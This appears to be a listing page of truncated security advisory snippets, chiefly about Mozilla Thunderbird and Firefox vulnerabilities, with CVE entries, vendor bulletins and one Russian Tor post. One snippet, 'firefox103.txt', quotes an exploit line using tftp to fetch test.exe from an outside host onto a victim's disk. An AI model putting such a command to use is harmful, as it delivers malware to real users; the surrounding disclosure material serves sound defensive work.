iStArtApp FileXChange 6.2 Command Injection / LFI / File Upload

Document Title: =============== iStArtApp FileXChange v6.2 iOS - Multiple Web Vulnerabilities References Source: ==================== http://www.vulnerability-lab.com/getcontent.php?id=1237 Release Date: ============= 2014-03-26 Vulnerability Laboratory ID VL-ID:...

Adobe Reader Remote Code Execution Vulnerability (APSB13-25) - Windows

Adobe Reader is prone to a remote code execution RCE vulnerability. SPDX-FileCopyrightText: 2013 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only CPE =...

Ubuntu 12.04 LTS / 12.10 / 13.04 : thunderbird vulnerabilities (USN-1925-1)

Jeff Gilbert and Henrik Skupin discovered multiple memory safety issues in Thunderbird. If the user were tricked in to opening a specially crafted message with scripting enabled, an attacker could possibly exploit these to cause a denial of service via application crash, or potentially execute...

Один сервер, Tor и Bitcoin

Всем доброго времени суток. В последнее время достаточно много новостей о Tor и Bitcoin, обе системы в достаточной мере направлены на безопасность и анонимность, однако их преимущества могут одновременно стать и недостатками. Структура Tor не позволяет определять местоположение клиента и сервера,...

USN-701-1: Thunderbird vulnerabilities

Several flaws were discovered in the browser engine. If a user had Javascript enabled, these problems could allow an attacker to crash Thunderbird and possibly execute arbitrary code with user privileges. CVE-2008-5500 Boris Zbarsky discovered that the same-origin check in Thunderbird could be...

[Full-disclosure] Calyptix Security Advisory CX-2007-05 - eSoft InstaGate EX2 Cross-Site Request Forgery Attack

Calyptix Security Advisory CX-2007-05 eSoft InstaGate EX2 Cross-Site Request Forgery Attack Date: 07/11/2007 http://www.calyptix.com/ http://labs.calyptix.com/CX-2007-05.php http://labs.calyptix.com/CX-2007-05.txt Overview Multiple versions of eSoft's InstaGate EX2 UTM device are vulnerable to...

CVE-2007-2400

Apple Safari affected: Safari 3 Beta up to 3.0.2 and iPhone Safari before 1.0.1. Root cause is a race condition during page updates and HTTP redirects, enabling cross-domain access and cross-site scripting via same-origin violations. Impact described as bypassing JavaScript security model and mod...

CentOS 3 : mozilla (CESA-2005:384)

Updated Mozilla packages that fix various security bugs are now available. This update has been rated as having Important security impact by the Red Hat Security Response Team. Mozilla is an open source Web browser, advanced email and newsgroup client, IRC chat client, and HTML editor. Several bu...

CVE-2006-0884

The WYSIWYG rendering engine "rich mail" editor in Mozilla Thunderbird 1.0.7 and earlier allows user-assisted attackers to bypass javascript security settings and obtain sensitive information or cause a crash via an e-mail containing a javascript URI in the SRC attribute of an IFRAME tag, which i...

Design/Logic Flaw

The WYSIWYG rendering engine "rich mail" editor in Mozilla Thunderbird 1.0.7 and earlier allows user-assisted attackers to bypass javascript security settings and obtain sensitive information or cause a crash via an e-mail containing a javascript URI in the SRC attribute of an IFRAME tag, which i...

CVE-2006-0884

The WYSIWYG rendering engine "rich mail" editor in Mozilla Thunderbird 1.0.7 and earlier allows user-assisted attackers to bypass javascript security settings and obtain sensitive information or cause a crash via an e-mail containing a javascript URI in the SRC attribute of an IFRAME tag, which i...

CVE-2006-0884

The WYSIWYG rendering engine "rich mail" editor in Mozilla Thunderbird 1.0.7 and earlier allows user-assisted attackers to bypass javascript security settings and obtain sensitive information or cause a crash via an e-mail containing a javascript URI in the SRC attribute of an IFRAME tag, which i...

CVE-2006-0884

The WYSIWYG rendering engine "rich mail" editor in Mozilla Thunderbird 1.0.7 and earlier allows user-assisted attackers to bypass javascript security settings and obtain sensitive information or cause a crash via an e-mail containing a javascript URI in the SRC attribute of an IFRAME tag, which i...

DSA-781-1 mozilla-thunderbird - several

Bulletin has no description...

firefox103.txt

firefox 1.0.3 spoof+auto dl ./0 bite the cheese illwill./ idiot tftp -i illmob.zapto.org get test.exe c:\test.exe ./-----------------js.js----------./ var blockedReferrer = 'blockedReferrer'; NSActualWrite=document.write; // Popup Blocker -- RanPostamble=0; NSActualOpen=window.open; function...

mozilla security update

CentOS Errata and Security Advisory CESA-2005:384 Merged security bulletin from advisories: https://lists.centos.org/pipermail/centos-announce/2005-April/073779.html https://lists.centos.org/pipermail/centos-announce/2005-April/073780.html...

RHEL 2.1 / 3 : Mozilla (RHSA-2005:384)

Updated Mozilla packages that fix various security bugs are now available. This update has been rated as having Important security impact by the Red Hat Security Response Team. Mozilla is an open source Web browser, advanced email and newsgroup client, IRC chat client, and HTML editor. Several bu...

Critical: Red Hat Security Advisory: firefox security update

Updated firefox packages that fix various bugs are now available. This update has been rated as having critical security impact by the Red Hat Security Response Team. Mozilla Firefox is an open source Web browser. A bug was found in the Firefox string handling functions. If a malicious website is...

security flaw

Firefox 1.0 does not invoke the Javascript Security Manager when a user drags a javascript: or data: URL to a tab, which allows remote attackers to bypass the security model, aka "firetabbing."...

CVE-2005-0231

Firefox 1.0 does not invoke the Javascript Security Manager when a user drags a javascript: or data: URL to a tab, which allows remote attackers to bypass the security model, aka "firetabbing."...